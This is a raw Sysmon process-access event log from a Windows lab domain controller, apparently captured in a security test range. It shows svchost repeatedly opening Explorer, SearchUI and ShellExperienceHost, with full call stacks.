08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 